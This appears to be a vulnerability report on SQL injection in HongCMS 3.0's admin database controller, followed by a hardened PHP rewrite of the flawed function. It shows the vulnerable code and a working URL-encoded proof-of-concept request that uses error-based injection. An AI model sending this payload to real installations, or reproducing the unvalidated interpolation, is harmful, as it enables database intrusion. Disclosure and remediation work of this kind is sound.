
HongCMS 3.0 - SQL Injection #4

Open
@Hzllaga

Vulnerability file: admin\controllers\database.php

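```php
private function EmptyTable($tablename)
{
    // $tablename is interpolated into the statement without any validation
    $this->db->exe("DELETE FROM `$tablename`");
    // Message text: "Finished emptying database table: "
    $msg = '已完成清空数据库表: ' . $tablename . '<br/>';

    return $msg;
}
```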

The $tablename parameter is controllable.

POC (Administrator Privilege):

/admin/index.php/database/operate?dbaction=emptytable&tablename=hong_vvc%60%20where%20vvcid%3D1%20or%20updatexml%282%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20or%20%60
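
A hardened form of the function, added here as an example; it is not part of the original issue and not HongCMS code. It assumes a PDO connection, uses an in-memory SQLite database as a stand-in for MySQL so it runs offline, and the names `listTables` and `emptyTableSafe` are hypothetical.

```php
<?php
// Added example, not HongCMS code. SQLite in-memory stands in for the MySQL
// backend so the script runs offline; the table and its rows are constructed.

/** Return the tables that really exist (SQLite catalog; MySQL would use SHOW TABLES). */
function listTables(PDO $pdo): array
{
    $stmt = $pdo->query("SELECT name FROM sqlite_master WHERE type = 'table'");
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

/**
 * Hardened counterpart of EmptyTable(): identifiers cannot be bound as
 * parameters, so the name is checked against a strict pattern and then
 * against the catalog before it is placed inside backticks.
 */
function emptyTableSafe(PDO $pdo, string $tablename): string
{
    // 1. Syntax check: letters, digits and underscore only. A backtick, space
    //    or parenthesis fails here.
    if (!preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $tablename)) {
        throw new InvalidArgumentException('Invalid table name');
    }
    // 2. Allowlist check: strict comparison against the existing tables.
    if (!in_array($tablename, listTables($pdo), true)) {
        throw new InvalidArgumentException('Unknown table');
    }
    $pdo->exec("DELETE FROM `$tablename`");
    // 3. The original concatenates the name into HTML, so encode it on output.
    return 'Emptied table: ' . htmlspecialchars($tablename, ENT_QUOTES, 'UTF-8') . '<br/>';
}

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE hong_vvc (vvcid INTEGER PRIMARY KEY, code TEXT)');
$pdo->exec("INSERT INTO hong_vvc (code) VALUES ('a'), ('b')");

echo emptyTableSafe($pdo, 'hong_vvc'), "\n"; // legitimate table name
echo $pdo->query('SELECT COUNT(*) FROM hong_vvc')->fetchColumn(), " rows left\n";

// The tablename value from the request in this report, URL-decoded as PHP would.
$reported = urldecode('hong_vvc%60%20where%20vvcid%3D1%20or%20updatexml%282%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20or%20%60');
try {
    emptyTableSafe($pdo, $reported);
} catch (InvalidArgumentException $e) {
    echo 'Rejected: ', $e->getMessage(), "\n";
}
```

The pattern check alone stops the backtick break-out; the catalog check additionally limits the action to tables that exist, which is where a deployment could narrow the allowlist further.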

